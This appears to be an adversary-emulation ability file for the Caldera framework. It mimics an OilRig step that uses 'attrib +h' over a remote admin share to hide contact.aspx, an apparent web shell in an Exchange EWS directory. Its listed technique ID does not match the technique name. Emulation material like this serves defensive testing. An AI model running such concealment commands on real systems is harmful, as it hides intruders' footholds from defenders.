ability_id: 5f7dc4b3-1287-4a25-b0b0-b6e73756cc11
access: {}
additional_info: {}
buckets:
- defense-evasion
delete_payload: true
description: 'Set file hidden attribute for contact.aspx on WATERFALLS

  '
executors:
- additional_info: {}
  build_target: null
  cleanup: []
  code: null
  command: attrib +h "\\#{second.target.ip}\C$\Program Files\Microsoft\Exchange Server\V15\ClientAccess\exchweb\ews\contact.aspx"
  language: null
  name: cmd
  parsers: []
  payloads: []
  platform: windows
  timeout: 60
  uploads: []
  variations: []
name: OilRig Set file hidden attribute
plugin: emu
privilege: ''
repeatable: false
requirements: []
singleton: false
tactic: defense-evasion
technique_id: T1082
technique_name: 'Hide Artifacts: Hidden Files & Directories'
